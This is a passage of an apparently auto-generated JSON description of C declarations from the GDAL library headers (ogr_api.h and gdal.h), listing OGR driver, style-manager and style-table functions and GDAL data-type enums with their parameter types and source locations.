"/usr/include/gdal/ogr_api.h:664:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRSFDriverH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_Dr_CreateDataSource", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:665:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRSFDriverH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": "OGRDataSourceH" } }, { "tag": "function", "name": "OGR_Dr_CopyDataSource", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:667:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRSFDriverH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": "OGRDataSourceH" } }, { "tag": "function", "name": "OGR_Dr_DeleteDataSource", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:669:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRSFDriverH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGROpen", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:673:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGRSFDriverH" } } }], "return-type": { "tag": "OGRDataSourceH" } }, { "tag": "function", "name": "OGROpenShared", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:674:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGRSFDriverH" } } }], "return-type": { "tag": "OGRDataSourceH" } }, { "tag": "function", "name": "OGRReleaseDataSource", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:675:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRDataSourceH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGRRegisterDriver", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:677:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRSFDriverH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGRDeregisterDriver", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:678:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRSFDriverH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGRGetDriverCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:680:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGRGetDriver", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:681:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRSFDriverH" } }, { "tag": "function", "name": "OGRGetDriverByName", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:682:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRSFDriverH" } }, { "tag": "function", "name": "OGRGetOpenDSCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:684:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGRGetOpenDS", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:685:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "iDS", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRDataSourceH" } }, { "tag": "function", "name": "OGRRegisterAll", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:688:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGRCleanupAll", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:692:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "typedef", "ns": 0, "name": "OGRStyleMgrH", "location": "/usr/include/gdal/ogr_api.h:703:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "OGRStyleToolH", "location": "/usr/include/gdal/ogr_api.h:705:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "OGR_SM_Create", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:710:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hStyleTable", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": "OGRStyleMgrH" } }, { "tag": "function", "name": "OGR_SM_Destroy", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:711:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hSM", "type": { "tag": "OGRStyleMgrH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_SM_InitFromFeature", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:713:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hSM", "type": { "tag": "OGRStyleMgrH" } }, { "tag": "parameter", "name": "hFeat", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_SM_InitStyleString", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:715:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hSM", "type": { "tag": "OGRStyleMgrH" } }, { "tag": "parameter", "name": "pszStyleString", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_SM_GetPartCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:717:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hSM", "type": { "tag": "OGRStyleMgrH" } }, { "tag": "parameter", "name": "pszStyleString", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_SM_GetPart", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:719:23", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hSM", "type": { "tag": "OGRStyleMgrH" } }, { "tag": "parameter", "name": "nPartId", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pszStyleString", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRStyleToolH" } }, { "tag": "function", "name": "OGR_SM_AddPart", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:721:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hSM", "type": { "tag": "OGRStyleMgrH" } }, { "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_SM_AddStyle", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:722:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hSM", "type": { "tag": "OGRStyleMgrH" } }, { "tag": "parameter", "name": "pszStyleName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pszStyleString", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_ST_Create", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:727:23", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eClassId", "type": { "tag": "OGRSTClassId" } }], "return-type": { "tag": "OGRStyleToolH" } }, { "tag": "function", "name": "OGR_ST_Destroy", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:728:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_ST_GetType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:730:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }], "return-type": { "tag": "OGRSTClassId" } }, { "tag": "function", "name": "OGR_ST_GetUnit", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:732:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }], "return-type": { "tag": "OGRSTUnitId" } }, { "tag": "function", "name": "OGR_ST_SetUnit", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:733:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }, { "tag": "parameter", "name": "eUnit", "type": { "tag": "OGRSTUnitId" } }, { "tag": "parameter", "name": "dfGroundPaperScale", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_ST_GetParamStr", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:736:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }, { "tag": "parameter", "name": "eParam", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "bValueIsNull", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_ST_GetParamNum", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:737:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }, { "tag": "parameter", "name": "eParam", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "bValueIsNull", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_ST_GetParamDbl", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:738:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }, { "tag": "parameter", "name": "eParam", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "bValueIsNull", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "OGR_ST_SetParamStr", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:739:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }, { "tag": "parameter", "name": "eParam", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pszValue", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_ST_SetParamNum", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:740:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }, { "tag": "parameter", "name": "eParam", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nValue", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_ST_SetParamDbl", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:741:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }, { "tag": "parameter", "name": "eParam", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "dfValue", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_ST_GetStyleString", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:742:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_ST_GetRGBFromString", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:744:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hST", "type": { "tag": "OGRStyleToolH" } }, { "tag": "parameter", "name": "pszColor", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pnRed", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnGreen", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnBlue", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnAlpha", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_STBL_Create", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:750:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": "OGRStyleTableH" } }, { "tag": "function", "name": "OGR_STBL_Destroy", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:751:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hSTBL", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_STBL_AddStyle", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:752:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hStyleTable", "type": { "tag": "OGRStyleTableH" } }, { "tag": "parameter", "name": "pszName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pszStyleString", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_STBL_SaveStyleTable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:755:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hStyleTable", "type": { "tag": "OGRStyleTableH" } }, { "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_STBL_LoadStyleTable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:757:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hStyleTable", "type": { "tag": "OGRStyleTableH" } }, { "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_STBL_Find", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:759:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hStyleTable", "type": { "tag": "OGRStyleTableH" } }, { "tag": "parameter", "name": "pszName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_STBL_ResetStyleStringReading", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:760:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hStyleTable", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_STBL_GetNextStyle", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:761:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hStyleTable", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_STBL_GetLastStyleName", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:762:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hStyleTable", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "enum", "ns": 0, "name": "", "id": 81, "location": "/usr/include/gdal/gdal.h:60:9", "fields": [{ "tag": "field", "name": "GDT_Unknown", "value": 0 }, { "tag": "field", "name": "GDT_Byte", "value": 1 }, { "tag": "field", "name": "GDT_UInt16", "value": 2 }, { "tag": "field", "name": "GDT_Int16", "value": 3 }, { "tag": "field", "name": "GDT_UInt32", "value": 4 }, { "tag": "field", "name": "GDT_Int32", "value": 5 }, { "tag": "field", "name": "GDT_Float32", "value": 6 }, { "tag": "field", "name": "GDT_Float64", "value": 7 }, { "tag": "field", "name": "GDT_CInt16", "value": 8 }, { "tag": "field", "name": "GDT_CInt32", "value": 9 }, { "tag": "field", "name": "GDT_CFloat32", "value": 10 }, { "tag": "field", "name": "GDT_CFloat64", "value": 11 }, { "tag": "field", "name": "GDT_TypeCount", "value": 12 }] }, { "tag": "typedef", "ns": 0, "name": "GDALDataType", "location": "/usr/include/gdal/gdal.h:77:3", "type": { "tag": ":enum", "name": "", "id": 81 } }, { "tag": "function", "name": "GDALGetDataTypeSize", "ns": 0, "location": "/usr/include/gdal/gdal.h:79:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDataType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetDataTypeSizeBits", "ns": 0, "location": "/usr/include/gdal/gdal.h:80:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eDataType", "type": { "tag": "GDALDataType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetDataTypeSizeBytes", "ns": 0, "location": "/usr/include/gdal/gdal.h:81:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDataType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALDataTypeIsComplex", "ns": 0, "location": "/usr/include/gdal/gdal.h:82:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDataType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALDataTypeIsInteger", "ns": 0, "location": "/usr/include/gdal/gdal.h:83:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDataType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALDataTypeIsFloating", "ns": 0, "location": "/usr/include/gdal/gdal.h:84:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDataType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALDataTypeIsSigned", "ns": 0, "location": "/usr/include/gdal/gdal.h:85:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDataType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetDataTypeName", "ns": 0, "location": "/usr/include/gdal/gdal.h:86:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDataType" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALGetDataTypeByName", "ns": 0, "location": "/usr/include/gdal/gdal.h:87:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "GDALDataType" } }, { "tag": "function", "name": "GDALDataTypeUnion", "ns": 0, "location": "/usr/include/gdal/gdal.h:88:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALDataType" } }], "return-type": { "tag": "GDALDataType" } }, { "tag": "function", "name": "GDALDataTypeUnionWithValue", "ns": 0, "location": "/usr/include/gdal/gdal.h:89:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eDT", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "dValue", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "bComplex", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "GDALDataType" } }, { "tag": "function", "name": "GDALFindDataType", "ns": 0, "location": "/usr/include/gdal/gdal.h:90:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nBits", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "bSigned", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "bFloating", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "bComplex", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "GDALDataType" } }, { "tag": "function", "name": "GDALFindDataTypeForValue", "ns": 0, "location": "/usr/include/gdal/gdal.h:91:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "dValue", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "bComplex", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "GDALDataType" } }, { "tag": "function", "name": "GDALAdjustValueToDataType", "ns": 0, "location": "/usr/include/gdal/gdal.h:92:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eDT", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "dfValue", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "pbClamped", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pbRounded", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "GDALGetNonComplexDataType", "ns": 0, "location": "/usr/include/gdal/gdal.h:93:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALDataType" } }], "return-type": { "tag": "GDALDataType" } }, { "tag": "function", "name": "GDALDataTypeIsConversionLossy", "ns": 0, "location": "/usr/include/gdal/gdal.h:94:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eTypeFrom", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "eTypeTo", "type": { "tag": "GDALDataType" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "enum", "ns": 0, "name": "", "id": 82, "location": "/usr/include/gdal/gdal.h:100:9", "fields": [{ "tag": "field", "name": "GARIO_PENDING", "value": 0 }, { "tag": "field", "name": "GARIO_UPDATE", "value": 1 }, { "tag": "field", "name": "GARIO_ERROR", "value": 2 }, { "tag": "field", "name": "GARIO_COMPLETE", "value": 3 }, { "tag": "field", "name": "GARIO_TypeCount", "value": 4 }] }, { "tag": "typedef", "ns": 0, "name": "GDALAsyncStatusType", "location": "/usr/include/gdal/gdal.h:107:3", "type": { "tag": ":enum", "name": "", "id": 82 } }, { "tag": "function", "name": "GDALGetAsyncStatusTypeName", "ns": 0, "location": "/usr/include/gdal/gdal.h:109:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALAsyncStatusType" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALGetAsyncStatusTypeByName", "ns": 0, "location": "/usr/include/gdal/gdal.h:110:41", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "GDALAsyncStatusType" } }, { "tag": "enum", "ns": 0, "name": "", "id": 83, "location": "/usr/include/gdal/gdal.h:113:9", "fields": [{ "tag": "field", "name": "GA_ReadOnly", "value": 0 }, { "tag": "field", "name": "GA_Update", "value": 1 }] }, { "tag": "typedef", "ns": 0, "name": "GDALAccess", "location": "/usr/include/gdal/gdal.h:116:3", "type": { "tag": ":enum", "name": "", "id": 83 } }, { "tag": "enum", "ns": 0, "name": "", "id": 84, "location": "/usr/include/gdal/gdal.h:119:9", "fields": [{ "tag": "field", "name": "GF_Read", "value": 0 }, { "tag": "field", "name": "GF_Write", "value": 1 }] }, { "tag": "typedef", "ns": 0, "name": "GDALRWFlag", "location": "/usr/include/gdal/gdal.h:122:3", "type": { "tag": ":enum", "name": "", "id": 84 } }, { "tag": "enum", "ns": 0, "name": "", "id": 85, "location": "/usr/include/gdal/gdal.h:128:9", "fields": [{ "tag": "field", "name": "GRIORA_NearestNeighbour", "value": 0 }, { "tag": "field", "name": "GRIORA_Bilinear", "value": 1 }, { "tag": "field", "name": "GRIORA_Cubic", "value": 2 }, { "tag": "field", "name": "GRIORA_CubicSpline", "value": 3 }, { "tag": "field", "name": "GRIORA_Lanczos", "value": 4 }, { "tag": "field", "name": "GRIORA_Average", "value": 5 }, { "tag": "field", "name": "GRIORA_Mode", "value": 6 }, { "tag": "field", "name": "GRIORA_Gauss", "value": 7 }] }, { "tag": "typedef", "ns": 0, "name": "GDALRIOResampleAlg", "location": "/usr/include/gdal/gdal.h:140:3", "type": { "tag": ":enum", "name": "", "id": 85 } }, { "tag": "typedef", "ns": 0, "name": "GDALRasterIOExtraArg", "location": 